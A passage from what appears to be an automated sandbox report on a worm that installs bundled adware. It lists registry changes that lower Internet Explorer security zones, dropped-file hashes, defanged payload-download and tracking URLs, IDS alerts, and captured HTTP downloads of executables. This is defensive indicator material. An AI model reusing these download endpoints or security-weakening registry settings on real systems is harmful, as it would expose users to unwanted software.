"WinU/Wmain/btdal_4.exe" = "btdal_4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 D5 78 0A 89 BC 03 45 DF 05 10 92 F1 22 4D 99"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft]
"WinU/Wmain/win-app_update_3.exe" = "combo pcopt ssup mypc"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft]
"WinU/Wmain/myapp_update_1.exe" = "myapp_update_1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 6de2e8524920c1b08d3c4ce77339cf44 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Microsoft\WinU\Wmain\win-app_update_3.exe |
| 66b22ad304fb2bff1edf9af6487f94f4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Microsoft\WinU\~ahwapkv.exe |
| 6acba8f2f86799d2e583b73dba58dab3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Microsoft\WinU\~nvpitzc.exe |
| 23128747b91b2f635a46b252f84c2ee1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\OnlineBackup.exe |
| 77750595d6b4a0687ce26c8acfce06f1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Reporter.exe |
| 62efa7b730eb0523a026ea4325403b77 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz45.tmp\nsSCM.dll |
| 5689d43c3b201dd3810fa3bba4a6476a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\vcredist_x86.exe |
| 95d8fce965edde8a5df7358330f97cb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~ssqyvbc.exe |
| 95d8fce965edde8a5df7358330f97cb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ssupsetup_binstall3[1].exe |
| 8210e0543ede5a4127fec5ba89273f9c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\mypcbackup[1].exe |
| 6de2e8524920c1b08d3c4ce77339cf44 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\app[1].exe |
| e2c80c6c8ba5d2847601c5f8d426b63a | c:\Program Files\MyPC Backup\AWSSDK.dll |
| 5bfc53c0daee82e70ef02b9cf7ae3042 | c:\Program Files\MyPC Backup\AlphaVSS.51.x86.dll |
| ba1d420f7fa1b4eef8cc127bee74a023 | c:\Program Files\MyPC Backup\AlphaVSS.52.x64.dll |
| 568754948b2aa5fcc41217fb28425cc5 | c:\Program Files\MyPC Backup\AlphaVSS.52.x86.dll |
| a3ef02398e089dcd9708cbc4e427d0f7 | c:\Program Files\MyPC Backup\AlphaVSS.60.x64.dll |
| 057cf7fd20135899d616714534d0b7a8 | c:\Program Files\MyPC Backup\AlphaVSS.60.x86.dll |
| 3116e40a8b9709917e1dc1db4e068152 | c:\Program Files\MyPC Backup\AlphaVSS.Common.dll |
| a985f2ca3a28936781a9dad4353558c1 | c:\Program Files\MyPC Backup\BackupStack.exe |
| 4719336898ac3e1b460dbaf94b322882 | c:\Program Files\MyPC Backup\Configuration Updater.exe |
| 753da5b59f0fc465ccd60a598d9b5780 | c:\Program Files\MyPC Backup\Crypto32.dll |
| 199b0a1373fc914a9b756b1f9f882899 | c:\Program Files\MyPC Backup\Crypto64.dll |
| dd8d165c82137473c969f240bb4114c8 | c:\Program Files\MyPC Backup\GetText.dll |
| e5cc3997457cd365e43c19f0f9110148 | c:\Program Files\MyPC Backup\LinqBridge.dll |
| 9b2ac62a9aab3369b253411c14b92fcb | c:\Program Files\MyPC Backup\LogicNP.EZShellExtensions.dll |
| fffc632d332055cf5977739e1f33e164 | c:\Program Files\MyPC Backup\MPCBClient.dll |
| 86f5940febb48786d68a5d15de29ccb0 | c:\Program Files\MyPC Backup\MPCBContextMenu.dll |
| 719977ea19a41cd8032fc3b2c1d5c647 | c:\Program Files\MyPC Backup\MPCBIconOverlays.dll |
| 3bc4965392d457485ba64b153eb2d8b6 | c:\Program Files\MyPC Backup\MyPC Backup.exe |
| 5a5498e2176e0f40a8fddd53da88920e | c:\Program Files\MyPC Backup\ObjectListView.dll |
| 4bb211393828d585cb5396a273008d94 | c:\Program Files\MyPC Backup\RegisterExtensionDotNet20_x64.exe |
| 74a8c01b69adedd7f1330245cd994821 | c:\Program Files\MyPC Backup\RegisterExtensionDotNet20_x86.exe |
| 158c16d067a3e27c1234b03aa69120b2 | c:\Program Files\MyPC Backup\RestartExplorer.exe |
| 1fd2755364c2bf4a11081e059f31953a | c:\Program Files\MyPC Backup\Service Start.exe |
| c7560e3f67cf79bea7fecc6822e75ed5 | c:\Program Files\MyPC Backup\Shared Stack.dll |
| 7f318451b318b0adb80286f18255285e | c:\Program Files\MyPC Backup\Signup Wizard.exe |
| 2372afcb8661ffa466110f9d877e608f | c:\Program Files\MyPC Backup\UnRegisterExtensions.exe |
| 997aa9f288828f499c938f7a3d1ac89e | c:\Program Files\MyPC Backup\Updater.exe |
| 1946bde7c1276752a747bf987bd0ccbf | c:\Program Files\MyPC Backup\diffstack.dll |
| 41250fdd94836e4437db67f455d9ebb3 | c:\Program Files\MyPC Backup\uninst.exe |
| 9f71303bddecf888cc77c2a486769c9d | c:\Program Files\MyPC Backup\x64\System.Data.SQLite.dll |
| 80725a732aba27911402f9ca09fede23 | c:\Program Files\MyPC Backup\x86\System.Data.SQLite.dll |
| 47857df83c1bd9755afd1c7f0ae65465 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.ATL_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_d01483b2\atl90.dll |
| 7b37f8ec25c9ad853e8126c1d0992201 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\msvcm90.dll |
| 871f979d70414c900b35e56222932daf | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\msvcp90.dll |
| 4d03ca609e68f4c90cf66515218017f8 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\msvcr90.dll |
| b02f2fc742d87f54a94fcd5f4ce71d52 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90chs.dll |
| 3460a87d70e659c44b9fec195345ac2e | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90cht.dll |
| d727f282a20ebff629f26e13ce8fcac9 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90deu.dll |
| 2229324ce0374811ca64a19ee62f130b | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90enu.dll |
| 154b11cc93fc5a4a03e21d3dedfb5879 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90esn.dll |
| 0f70ab283544f8dd3e5c7b2c27c34bbf | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90esp.dll |
| 3c26a63c73eb4d6bda72815fcad79ef2 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90fra.dll |
| 25b61d43310128c1467c1d51397b5342 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90ita.dll |
| be48c834229e153ab89bcca1f8309315 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90jpn.dll |
| 6574e30c091c2ac5c99db460094f19a0 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90kor.dll |
| c1e0a8ab46902ee0e15e02931efcb885 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_b0db7d03\mfc90rus.dll |
| 361a47591fd31ec99a9794b6541360a6 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_405b0943\mfc90.dll |
| a76104d8d9aba3670fd3cea603d70ada | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_405b0943\mfc90u.dll |
| c38774421c7b64d2c23129a200c60f47 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_405b0943\mfcm90.dll |
| db59cce916665d8c9a8a87198daede34 | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_405b0943\mfcm90u.dll |
| f6a85f3b0e30c96c993c69da6da6079e | c:\WINDOWS\WinSxS\x86_Microsoft.VC90.OpenMP_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_ecc42bd1\vcomp90.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United Kingdom)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 1687552 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 1691648 | 348160 | 345088 | 5.50113 | 9758388fb2421de6a63a5ecd8ebaf912 |
| .rsrc | 2039808 | 1155072 | 1152000 | 5.53252 | f2163b343c6bda319c499ada106c3054 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://37.59.253.1/stats/winUSet.php?deploy_systemTask_prepare=true | |
| hxxp://37.59.253.1/stats/winUSet.php?deploy_systemTask_success=true | |
| hxxp://37.59.253.1/stats/winUSet.php?install_systemTask_fail=true | |
| hxxp://37.59.253.1/stats/configuration/time_range | |
| hxxp://37.59.253.1/stats/systemTaskSet.php?adminTask_absent=true | |
| hxxp://37.59.253.1/stats/winUSet.php?deploy_adminTask_prepare=true | |
| hxxp://37.59.253.1/stats/systemTaskSet.php?multiSession=true | |
| hxxp://37.59.253.1/stats/winUSet.php?deploy_adminTask_success=true | |
| hxxp://37.59.253.1/stats/systemTaskSet.php?browser_other=true | |
| hxxp://37.59.253.1/stats/systemTaskSet.php?os_winXp_X86=true | |
| hxxp://37.59.253.1/stats/winUSet.php?install_adminTask_fail=true | |
| hxxp://37.59.253.1/canal/conf | |
| hxxp://37.59.253.1/canal/main/conf | |
| hxxp://37.59.253.1/canal/rotateur/conf | |
| hxxp://37.59.253.1/canal/rotateur/winUoffer.params | |
| hxxp://37.59.253.1/canal/rotateur/getCaping.php?p=mypcbackup | |
| hxxp://displayssl.deeal.net/stats/systemTaskSet.php?pays_other=true | |
| hxxp://softs.illyx.com/setup/ressources/partenaires_financiers/MYPCBACKUP/mypcbackup.exe | |
| hxxp://displayssl.deeal.net/stats/partenaires/mypcbackupSet.php?download_success=true | |
| hxxp://track.mypcbackup.com/abbf6853/D0wnloads-KreaCPL/MyPCBackup_Setup.exe | |
| hxxp://mypcbackup.jdibackup.netdna-cdn.com/MyPCBackup_Setup.exe | |
| hxxp://displayssl.deeal.net/stats/partenaires/mypcbackupSet.php?install_success=true | |
| hxxp://track.mypcbackup.com/aadebc4830c51c2794a960fe5a9e11df.php | |
| hxxp://a767.dscms.akamai.net/download/d/d/9/dd9a82d0-52ef-40db-8dab-795376989c03/vcredist_x86.exe | |
| hxxp://displayssl.deeal.net/canal/rotateur/getCaping.php?p=combo1 | |
| hxxp://displayssl.deeal.net/canal/rotateur/getCaping.php?p=combo2 | |
| hxxp://softs.illyx.com/setup/ressources/partenaires_financiers/KREAPIXEL/combo_ssup_winu/app.exe | |
| hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
| hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
| hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43.crt | |
| hxxp://digicert.cachefly.net/DigiCertAssuredIDRootCA.crl | |
| hxxp://cs9.wac.edgecastcdn.net/sha2-assured-cs-g1.crl | |
| hxxp://displayssl.deeal.net/canal/rotateur/getCaping.php?p=systemspeedup | |
| hxxp://softs.illyx.com/setup/ressources/partenaires_financiers/SYSTEMSPEEDUP/ssupsetup_binstall3.exe | |
| hxxp://displayssl.deeal.net/stats/partenaires/systemspeedupSet.php?download_success=true | |
| hxxp://crl4.digicert.com/DigiCertAssuredIDRootCA.crl | |
| hxxp://winu.secureddl.com/canal/main/conf | |
| hxxp://winu.secureddl.com/canal/rotateur/conf | |
| hxxp://winu.secureddl.com/canal/rotateur/getCaping.php?p=combo2 | |
| hxxp://winu.secureddl.com/canal/rotateur/getCaping.php?p=combo1 | |
| hxxp://winu.secureddl.com/stats/configuration/time_range | |
| hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43.crt | |
| hxxp://winu.secureddl.com/stats/winUSet.php?deploy_adminTask_prepare=true | |
| hxxp://crl3.digicert.com/sha2-assured-cs-g1.crl | |
| hxxp://winu.secureddl.com/stats/winUSet.php?install_adminTask_fail=true | |
| hxxp://winu.secureddl.com/canal/conf | |
| hxxp://winu.secureddl.com/stats/systemTaskSet.php?adminTask_absent=true | |
| hxxp://winu.secureddl.com/canal/rotateur/getCaping.php?p=systemspeedup | |
| hxxp://winu.secureddl.com/stats/partenaires/systemspeedupSet.php?download_success=true | |
| hxxp://winu.secureddl.com/stats/systemTaskSet.php?pays_other=true | |
| hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
| hxxp://winu.secureddl.com/stats/winUSet.php?deploy_systemTask_prepare=true | |
| hxxp://winu.secureddl.com/stats/winUSet.php?deploy_adminTask_success=true | |
| hxxp://winu.secureddl.com/stats/partenaires/mypcbackupSet.php?install_success=true | |
| hxxp://winu.secureddl.com/stats/systemTaskSet.php?multiSession=true | |
| hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
| hxxp://winu.secureddl.com/stats/systemTaskSet.php?browser_other=true | |
| hxxp://winu.secureddl.com/stats/winUSet.php?deploy_systemTask_success=true | |
| hxxp://winu.secureddl.com/canal/rotateur/winUoffer.params | |
| hxxp://cdn.mypcbackup.com/MyPCBackup_Setup.exe | |
| hxxp://download.microsoft.com/download/d/d/9/dd9a82d0-52ef-40db-8dab-795376989c03/vcredist_x86.exe | |
| hxxp://winu.secureddl.com/stats/winUSet.php?install_systemTask_fail=true | |
| hxxp://winu.secureddl.com/stats/partenaires/mypcbackupSet.php?download_success=true | |
| hxxp://winu.secureddl.com/stats/systemTaskSet.php?os_winXp_X86=true | |
| hxxp://winu.secureddl.com/canal/rotateur/getCaping.php?p=mypcbackup |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
<font color="red">GET /stats/partenaires/systemspeedupSet.php?download_success=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:49 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]......</pre></font><br><br
<font color="red">GET /abbf6853/D0wnloads-KreaCPL/MyPCBackup_Setup.exe HTTP/1.0<br>
Host: track.mypcbackup.com<br>
User-Agent: NSISDL/1.2 (Mozilla)<br>
Accept: */*<br>
<br>
</font><br><font color="blue">HTTP/1.1 301 Moved Permanently<br>
Date: Wed, 13 Aug 2014 18:28:20 GMT<br>
Server: Apache<br>
Set-Cookie: SESSID=mq10ant96742s2jihfk332dr44; path=/; domain=.mypcbackup.com<br>
Expires: Thu, 19 Nov 1981 08:52:00 GMT<br>
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br>
Pragma: no-cache<br>
Set-Cookie: LC_CURRENCY=CA; expires=Sat, 23-Aug-2014 18:28:20 GMT; path=/; domain=.mypcbackup.com<br>
Set-Cookie: ?uva6aT*=CA; expires=Sat, 23-Aug-2014 18:28:20 GMT; path=/; domain=.mypcbackup.com<br>
Set-Cookie: LC_CURRENCY=CA; expires=Sat, 23-Aug-2014 18:28:20 GMT; path=/; domain=.mypcbackup.com<br>
Set-Cookie: ?uva6aT*=CA; expires=Sat, 23-Aug-2014 18:28:20 GMT; path=/; domain=.mypcbackup.com<br>
Set-Cookie: 748a7624422584634822bd3a2bf604ae=ec4e10ee64f732d5e95ea92b8cf15933; expires=Thu, 11-Dec-2014 18:28:20 GMT; path=/; domain=.mypcbackup.com<br>
Set-Cookie: intc=1; expires=Thu, 14-Aug-2014 18:28:20 GMT; path=/; domain=.mypcbackup.com<br>
P3P: CP="We do not have a P3P policy"<br>
location: hXXp://cdn.mypcbackup.com/MyPCBackup_Setup.exe<br>
Set-Cookie: aff_id=77889; expires=Sun, 14-Sep-2014 05:59:59 GMT; path=/; domain=mypcbackup.com<br>
Set-Cookie: hop_name=KreaCPL; expires=Sun, 14-Sep-2014 05:59:59 GMT; path=/; domain=mypcbackup.com<br>
Set-Cookie: hop_id=115851; expires=Sun, 14-Sep-2014 05:59:59 GMT; path=/; domain=mypcbackup.com<br>
Set-Cookie: hash=66a8e48da32ffd43cb94264bddafc6ec; expires=Sun, 14-Sep-2014 05:59:59 GMT; path=/; domain=mypcbackup.com<br>
Set-Cookie: tid=D0wnloads-KreaCPL; expires=Sun, 14-Sep-2014 05:59:59 GMT; path=/; domain=mypcbackup.com<br>
Set-Cookie: abbf6853unique=true; expires=Tue, 11-Nov-2014 18:28:20 GMT; path=/; domain=mypcbackup.com<br>
Content-Length: 0<br>
Content-Type: text/html; charset=UTF-8<br>
Set-Cookie: MPBWWW=640052152.1.1048087952.3333066368; path=/<br><pre></pre><<< skipped >>></font><br><br
<font color="red">GET /setup/ressources/partenaires_financiers/SYSTEMSPEEDUP/ssupsetup_binstall3.exe HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: softs.illyx.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:41 GMT<br>
Server: Apache<br>
Last-Modified: Wed, 23 Jul 2014 16:58:10 GMT<br>
ETag: "3c0d76-3f8070-4fedf3eb42c80"<br>
Accept-Ranges: bytes<br>
Content-Length: 4161648<br>
Content-Type: application/x-msdos-program<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i<br>u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f<br>.R.................^...|.......0.......p....@.........................<br>.................................................t....................<br>...................................................................p..<br>.............................text....].......^.................. ..`.r<br>data.......p.......b..............@[email protected]..........<br>....@....ndata...................................rsrc................z<br>..............@..@....................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>............................................U....\.}..t .}.F.E.u..H...<br>[email protected]@..e...E..E.P.u....r@<br>..}[email protected]... M.......M....3.....FQ.....NU..M.....<br>.....VT..U.....FP..E...............E.P.M...Tp@[email protected]<br>....E..9}[email protected].}.j.W.E......E.......@[email protected]..<br>[email protected]<[email protected] [email protected]...\r@._<br>^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G<br>.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i.</pre><<< skipped >>></font><br><br
<font color="red">GET /stats/partenaires/mypcbackupSet.php?install_success=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:23 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br><font color="red">GET /canal/rotateur/getCaping.php?p=combo1 HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:26 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 28<br>
Content-Type: text/html<br><pre>..................T._.......</font>....</pre></font><br><br><font color="red">GET /canal/rotateur/getCaping.php?p=combo1 HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:28 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Length: 13<br>
Content-Type: text/html<br><pre>.....true</font>....</pre></font><br><br><font color="red">GET /canal/rotateur/getCaping.php?p=combo2 HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:29 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 28<br>
Content-Type: text/html<br><pre>..................T._.......</font>....</pre></font><br><br><font color="red">GET /canal/rotateur/getCaping.php?p=combo2 HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:31 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Length: 13<br>
Content-Type: text/html<br><pre>.....true..</pre></font><br><br
<font color="red">GET /setup/ressources/partenaires_financiers/KREAPIXEL/combo_ssup_winu/app.exe HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: softs.illyx.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:32 GMT<br>
Server: Apache<br>
Last-Modified: Wed, 06 Aug 2014 13:03:16 GMT<br>
ETag: "160314-6a800-4fff5986a0d00"<br>
Accept-Ranges: bytes<br>
Content-Length: 436224<br>
Content-Type: application/x-msdos-program<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......S...........<br>.....g..........$...............%.....H.......X.2...........q)..Z...q)<br>......q)........\.....q)......Rich............................PE..L...<br>v'.S.........."......P...`....................@.......................<br>...@............@...@[email protected]:..$.......lZ......<br>.............>..........................................H..........<br>.................................UPX0.................................<br>[email protected]....`.......`...H.....<br>.........@............................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>..........3.91.UPX!.........p.:.....?......&..e....U......}..SVW....`.<br>.....E.t..u....}........H...t. ......v.L..4.....G..I.........&.k..]..@<br>..E......V......~.....t..........}.;._..>r..E._^[.........=.......M<br>.....Po..>..i....j0X.E....F!..A...x.V]*.a.....op6......a;j.{..on...<br>..Y..t1&.H..Nt...|.x..0.V.8.G&F..w..|.|..8.f.3....QS......V.>W.M...<br>..C..!....S.:.5.....t..]...3......W.~9.:.x...}u(.~.._...t..7uPW_...kzY<br>.^..FZ[................T.....~...v.k...F.....4......4,.n_..F....8B..6)<br>xh....9YV..,..../....Zu.z..lx....jY8.jX...ox......U......a......p.</pre><<< skipped >>></font><br><br
<font color="red">GET /MyPCBackup_Setup.exe HTTP/1.0<br>
Host: cdn.mypcbackup.com<br>
User-Agent: NSISDL/1.2 (Mozilla)<br>
Accept: */*<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
